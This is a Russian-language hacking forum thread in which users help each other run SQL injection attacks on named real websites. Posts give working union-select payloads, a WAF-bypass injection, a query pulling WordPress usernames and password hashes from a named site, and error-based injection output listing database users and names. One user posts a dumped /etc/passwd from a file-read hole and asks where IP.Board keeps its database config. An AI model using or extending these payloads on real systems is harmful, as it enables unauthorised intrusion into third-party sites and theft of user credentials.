Вопрос по sqli Всем доброго времени суток. А можно просветить неофита? Скуль однако... Вбиваем в поисковую форму 1' Получаем По вашему запросу 1\' ничего не найдено Понятно, ' экранируется Вбиваем 1" Получаем По вашему запросу 1\ Ну много чего там найдено, т.е. как то запрос обработан (хз чего там оно искало, 1 ?) Хорошо, 1"' По вашему запросу 1\ ничего не найдено уже не понимаю, экран сработал, но почему разный результат? Ну и 1'" А вот тут полный компрес Ошибка при обращении к БД: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`=' at line 1 SELECT `t`.`title`, `t`.`text`, `t`.`keywords`, `t`.`description` FROM `titler` `t` WHERE ( `t`.`page`='/search/?query=1'%22' OR `t`.`page`='http://www.bogomerzko.com/search/?query=1'%22' ) AND `t`.`lang`='1' ORDER BY `t`.`page` DESC LIMIT 1 А как мну дальше? Что обозначает срабатывание на '" ?
пробуй юзать как в последнем варианте: 1'"+union+select+...+--+ ну или для начала проверь 1'"+--+ ошибки не должно быть. а так больше ничего сказать не могу
у меня вопрос значит есть сайт, на нем есть поиск. вбиваю в поиск 1, в результатах выводятся все статьи, содержащие цифру 1 вбиваю 35332563567, результат - "ничего не найдено" вбиваю qwerty, результат " DB query error. Please try later." а если вбить 'qwerty', то пишет как во втором варианте "ничего не найдено" пробовал еще 1+--+ или 1#, выводит DB query... а для 1/* результат как для 1 как мне дальше быть? если есть кто хорошо понимает, могу в личку сайт скинуть
вот например инъекция www.bgci.org/garden.php?id=787'+and+1=0+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135+--+ не другого выхода чтоб вывести информацию? а то 135 полей это слишком
Текущее время: 02:21. Часовой пояс GMT. Powered by vBulletin® Version 4.2.0 Copyright © 2013 vBulletin Solutions, Inc. All rights reserved. Перевод: zCarot кто знает что за нулл? Как заливать шелл? Где дырки? обсуждалось? тогда сорри жду ссылку
есть сайт один: так идет пустая страница http://site/?pay_system_id=1 а так ошибка http://site/?pay_system_id=1' ORA-06502: PL/SQL: numeric or value error: character to number conversion error это инъекция? никогда не сталкивался с оракл
Не, это не инъекция. Скорее всего ошибка с типом данных у разработчика. На возможную инъекцию могут указывать следующие коды ошибок: ORA-00933, ORA-01756, ORA-00923 .
Имею читалку. Есть ли способы найти пути до сайта? В /etc/passwd простыня: Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt ........ u1724698:x:505:503::/var/www/u1724698:/bin/false u1725105:x:508:505::/var/www/u1725105:/bin/false u1725703:x:514:511::/var/www/u1725703:/bin/bash u1725757:x:515:512::/var/www/u1725757:/bin/false u1726055:x:517:514::/var/www/u1726055:/bin/bash u1726273:x:518:515::/var/www/u1726273:/bin/false u1726588:x:519:516::/var/www/u1726588:/bin/bash u1727690:x:525:522::/var/www/u1727690:/bin/false u1727944:x:526:523::/var/www/u1727944:/bin/bash u1728689:x:529:526::/var/www/u1728689:/bin/bash u1730438:x:540:537::/var/www/u1730438:/bin/false u1730873:x:541:538::/var/www/u1730873:/bin/bash u1731459:x:542:539::/var/www/u1731459:/bin/false u1732269:x:545:542::/var/www/u1732269:/bin/bash u1732843:x:558:555::/var/www/u1732843:/bin/bash u1736727:x:568:565::/var/www/u1736727:/bin/false u1733648:x:571:568::/var/www/u1733648:/bin/bash u1739821:x:580:577::/var/www/u1739821:/bin/bash u1739860:x:581:578::/var/www/u1739860:/bin/bash u1740237:x:582:579::/var/www/u1740237:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin u1741842:x:591:588::/var/www/u1741842:/bin/bash u1742085:x:593:590::/var/www/u1742085:/bin/bash u1742435:x:594:591::/var/www/u1742435:/bin/bash u1730937:x:599:596::/var/www/u1730937:/bin/bash u1743741:x:601:598::/var/www/u1743741:/bin/bash u1744116:x:603:600::/var/www/u1744116:/bin/bash u1744426:x:606:603::/var/www/u1744426:/bin/bash u1744904:x:610:607::/var/www/u1744904:/bin/bash u1747647:x:620:617::/var/www/u1747647:/bin/bash u1750941:x:629:626::/var/www/u1750941:/bin/bash u1753996:x:638:635::/var/www/u1753996:/bin/bash u1755152:x:643:640::/var/www/u1755152:/bin/bash и т.д На сайте стоит SMF 2.0.4. Есть что к нему? Путь нужно только расскрыть. Спасибо.
HTTP/1.0 404 Not Found Уже смотрел. Еще вопрос: где хранятся конфиги с коннектом к БД в IP.Board 3.3.4?
Помогите раскрутить инъекцию с обходом WAF. В общем я добился вывода версии, юзера etc, но не могу получить имя БД, таблицы, ну и соответветственно содержимое таблиц. Фильтрую в /*! */ всё подряд, но 406 ошибка. Заранее спасибо. Code: http://www.lopusina.com/knjiga.html?id=36 /*!union*/(select all 1,/*!version()*/,3,4,5,6,7,8,9,10,11,12)--+ Вывод в 238 строчке исходника.
http://www.dnrltd.com/job_details.php?id=-64%20/*!union*/%20%28/*!select*/%20all%201,2,3,4,5,6,7,8,9,10,11,12,/*!concat_ws%280x3a,user_login,user_pass%29*/,14,15,16%20from%20wp_users+limit+1,1%20%29--+
Code: http://pfl.ua/articles/?art=1275511872 Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5.
Посредством POST запроса все проходит на ура: http://pfl.ua/articles/?art=1275511872+or+1+group+by+concat((select+user()),floor(rand(0)*2))+having+min(0)--+ DATA: USERflcom_db@localhost DBflcom_db DB LIST: pflcom_db information_schema mafpfl pfl_db pfl_forum pflcom_db
